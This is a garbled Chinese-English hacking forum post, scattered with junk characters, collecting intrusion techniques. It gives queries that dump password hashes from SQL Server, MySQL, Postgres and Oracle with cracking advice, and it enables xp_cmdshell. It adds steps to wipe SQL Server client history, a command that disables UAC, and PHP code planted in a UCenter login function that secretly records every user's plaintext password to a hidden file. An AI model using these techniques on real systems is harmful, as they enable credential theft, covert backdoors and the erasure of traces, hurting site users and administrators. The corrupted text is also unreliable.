, y0 J- j0 z! F% @- P' V- X各种类型数据库抓HASH破解最高权限密码!" P, W/ J4 ^( G& {
1.sql server2000
% @6 l8 h3 }5 ^5 ~& W2 bSELECT password from master.dbo.sysxlogins where name='sa'
/ v' Z+ y3 W9 e0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
0 S: V& v4 l- r: |2FD54D6119FFF04129A1D72E7C3194F7284A7F3A5 b- d7 n- D6 {& a+ E
! P) W: }4 q; ?: a( Z; f2 W4 a; e3 {8 N
0×0100- constant header
; J' p" V. p: }, x- ]34767D5C- salt
8 w3 u! S) S6 j0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
8 |: v. H" n# i% Y, \2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
- ?9 o( U. I, P# l/ Q# A) F0 Ocrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
# L) n' i: {; |% J4 [ xSQL server 2005:-
1 V0 Q3 @# W, p. eSELECT password_hash FROM sys.sql_logins where name='sa'
$ ~/ ?9 i9 S) I0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F" h, t& e5 \8 n2 ?! Z6 T3 [
0×0100- constant header
2 K& U5 Q* M( q8 D9 g( Q993BF231-salt8 u+ Z7 O. @5 x( W
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash3 L% @3 ^' z+ I8 m# F; i
crack case sensitive hash in cain, try brute force and dictionary based attacks.
7 M+ V- E3 o# ~$ f6 K: Q9 N$ t6 L6 o. ?* o& @9 `
update:- following bernardo’s comments:-
' `+ c5 e4 G* u' |use function fn_varbintohexstr() to cast password in a hex string.
0 T/ @. ~2 z ?. i, ^e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins1 P4 \* x/ t. h. i C; E) R
# Y! Y0 B2 d) n3 P, Y& E( X9 [MYSQL:-1 c) C8 j4 m) B0 H5 S
" f, ^# U! c% T3 e u& r" NIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.5 Z( `( P1 y8 r9 L
" m% ]% p' N' j* _* _" G8 Y*mysql < 4.1
2 ]1 R! B: q4 J5 O9 w+ I) R! Z7 j0 x* C3 x# w R; u% L0 G) N3 e1 Y" I
mysql> SELECT PASSWORD(‘mypass’);
) }# w; [+ k5 p+——————–+
1 c+ P ^1 `6 N8 {; V- p7 i| PASSWORD(‘mypass’) |
+ d. B6 x7 R4 H" e+——————–+
) `2 m- }7 ~7 E. M) p: d| 6f8c114b58f2ce9e |* A5 |+ T. _ L0 V; f2 ~
+——————–+
* ~. U' L) Y. `
8 Z+ s( x7 A- u% T. v( D" E( h*mysql >=4.1/ }& E( @% O, t7 U
L# K- d3 X( s+ m. }3 A! t: e: Qmysql> SELECT PASSWORD(‘mypass’);
8 K: D! W# H. m: n# U+——————————————-+
3 u1 k" S/ |/ E# L4 u| PASSWORD(‘mypass’) |
: }! Q7 S. X; @/ ?6 @" K+——————————————-+3 `8 X0 t9 P% I( C
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |" p u7 P/ \7 J2 s8 V1 p7 s
+——————————————-+
6 C$ o% I* O6 U# i+ W$ w5 B
" c9 Y& T5 f/ U' q" ?4 xSelect user, password from mysql.user2 ~9 U3 T7 ?0 e) q& Q
The hashes can be cracked in ‘cain and abel’
) @8 U6 {$ [1 g1 k6 W" {/ w1 i* h0 H
Postgres:-
2 O8 C% C9 T7 T; z4 o: c, PPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)/ `# Q! }. D* i! h! i) W
select usename, passwd from pg_shadow;$ e* C3 x" B7 N7 S
usename | passwd
: R& t7 d' z0 Q; e. f——————+————————————-- M' ?$ Y1 s0 t P
testuser | md5fabb6d7172aadfda4753bf0507ed4396
7 C& u" f {+ [$ ~' t1 ~4 ouse mdcrack to crack these hashes:-
: _' m* L1 }- L, |$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
1 E5 M: T5 @# g* |( n6 [
1 O1 Y0 E4 g/ e/ V K" ROracle:-
3 n9 _2 l' Y) y5 r( \select name, password, spare4 from sys.user$
5 T4 @& T" J( S+ C( qhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g0 w: c3 O3 u: \' |) z
More on Oracle later, i am a bit bored….& H% P/ ~6 f4 U% C0 D
& \& L7 S! N, Y7 }; T
/ M9 W/ P2 }: q. @4 p* l6 G在sql server2005/2008中开启xp_cmdshell
4 g' m5 h+ x/ Y-- To allow advanced options to be changed./ B% k2 n4 j U5 M# }% ]) n
EXEC sp_configure 'show advanced options', 1$ q2 b2 r5 H& r8 k' A2 l
GO
. |$ @% ?( z- |5 `; L2 A( c-- To update the currently configured value for advanced options.1 u* T4 ?9 [# p6 L) k* A
RECONFIGURE6 Y; Q z, ^$ g+ R) M
GO
0 [. p' W- G; X- a8 M( ?; u-- To enable the feature.
# S, G2 ]3 Y R2 u. m. `, n2 XEXEC sp_configure 'xp_cmdshell', 1 g( b2 W; g; B9 {' J% _
GO
8 [& s1 g) b0 y4 b/ L) U" k-- To update the currently configured value for this feature.6 N8 W& J4 I P: N4 `$ }0 V9 i
RECONFIGURE
+ L; g8 A1 z( ~5 L: nGO4 P5 S9 ^, [2 J/ B1 n6 |$ F0 [6 L
SQL 2008 server日志清除,在清楚前一定要备份。
0 {% @- b+ ~$ V3 u+ @3 U如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:2 z, t. Q' k! g- T9 \
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
- _; }# ], C% G' }' W; N8 x( r+ [" r6 T3 O! I
对于SQL Server 2008以前的版本:
6 Y9 n. m7 t8 \8 B i( QSQL Server 2005:: p3 A8 j5 O( s+ K* {/ ^6 `
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
9 ~1 s3 Z- G0 P2 GSQL Server 2000:0 c) L8 y; l% v2 x }
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
8 ?* N4 P% E9 A6 Z2 [9 u* @" _0 C, x! ~ ]* I
本帖最后由 simeon 于 2013-1-3 09:51 编辑) v& W7 K, U0 e) f4 `% V. B
8 y$ H9 x' {# z& ^5 c& W
5 E/ A+ J" V# q. L b# Y: A
windows 2008 文件权限修改$ g A1 g' M2 M9 O
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
4 v- D9 u: _' ^# b2 J5 {2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
5 h* \4 f& f; x+ N' _一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,; e8 R, u$ e1 m0 J, U2 ?
7 l) p1 x; e, \7 ]3 i! F& B; |
Windows Registry Editor Version 5.00
* f* N) g8 Q" z0 V" r* ~( ^0 c( Y* o[HKEY_CLASSES_ROOT\*\shell\runas]
, ` u& e9 c) t5 U3 L@="管理员取得所有权"/ s& R- s7 [( b# j' N
"NoWorkingDirectory"=""* V: e, d1 D+ t' z1 u# O {3 X
[HKEY_CLASSES_ROOT\*\shell\runas\command]( D2 K6 p* S1 l3 I& w
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
- W9 i F6 l) }7 H2 }& J: @* H- R"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
G' L o- n! c: ^+ ?. c[HKEY_CLASSES_ROOT\exefile\shell\runas2]$ S) Y) O0 {1 t; x3 r3 ~9 I
@="管理员取得所有权"' v: R0 d" F1 I/ ]2 s& |2 R; l
"NoWorkingDirectory"=""
) I; g0 I! |" F/ z[HKEY_CLASSES_ROOT\exefile\shell\runas2\command], @2 x/ J5 r6 {& z2 x# G6 b: B6 x
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
& O9 T- R- N# r$ H" g7 l"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 S% J0 y3 Z/ b5 f; j9 E! ]! e. ^9 B8 b0 H' z1 N9 O) L5 y+ J
[HKEY_CLASSES_ROOT\Directory\shell\runas]
2 j5 ]1 m: ]! F. b@="管理员取得所有权"4 |- o& y/ x* W! L1 B) _& i
"NoWorkingDirectory"=""/ f: |5 _' m$ r N6 r u% s6 Z
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]3 g. p% ]2 ~ k0 s/ _' Y4 ?
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"% v# k) f" h! Y' X0 |3 Q3 P; r
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
! p$ p; e) X: t, \* J. w& C" `8 W, @2 U" |/ D" l3 F$ O7 Y) S% N
9 G" l2 p/ F- c" f- R# {% K8 Wwin7右键“管理员取得所有权”.reg导入" Z) h% s- i: C. ]- k* L. T- R
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,, l5 `3 L: m, u, @
1、C:\Windows这个路径的“notepad.exe”不需要替换
' o7 I2 o- F' d2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
6 k1 p# v8 Y' y4 p( d" x9 Y4 o. _3、四个“notepad.exe.mui”不要管
, W, v8 I% O9 S# _) [4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
3 T+ M. h8 j$ _2 k( f5 ^C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe” ^; f$ u! g* [7 D; J7 ~+ A
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,% L$ b. [+ H7 l3 c+ p7 k1 _0 [. o
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。) a+ q4 U: _! P2 `) x
windows 2008中关闭安全策略:
5 B# L, V5 M" z* H6 areg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
. S; A3 e/ T' M# x" {1 G3 h修改uc_client目录下的client.php 在
) T! I* B& ~ c. afunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {* K2 Z! ^( N2 ?2 O; f) Z/ C
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
* c0 d* V' {, o! L+ ~你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw/ }% ^6 U6 {7 Z6 N8 {
if(getenv('HTTP_CLIENT_IP')) {
6 ^$ B% [; q, p, ?' ?" A$onlineip = getenv('HTTP_CLIENT_IP');
7 c! v7 c5 N3 J8 I} elseif(getenv('HTTP_X_FORWARDED_FOR')) {7 k3 u1 ?- P" I: M2 e) Z% e( Z
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
1 i- L1 c% s8 @/ w% l. o b} elseif(getenv('REMOTE_ADDR')) {8 J/ x, q- S/ _8 s7 q
$onlineip = getenv('REMOTE_ADDR');7 ?4 v2 M: k1 s W; D3 k
} else {9 P$ g2 \9 L' y" s0 z; ` F
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
/ t% @0 k" s, q; m7 y$ u8 S3 |}
, ~( H9 J* B4 S a9 [ $showtime=date("Y-m-d H:i:s");
: U h( C+ l. j/ n $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";, E% P z& @+ U; V( Y: n! q
$handle=fopen('./data/cache/csslog.php','a+');
& Z/ g/ _+ Q2 ?+ | A, w$ V- i& {/ m $write=fwrite($handle,$record); |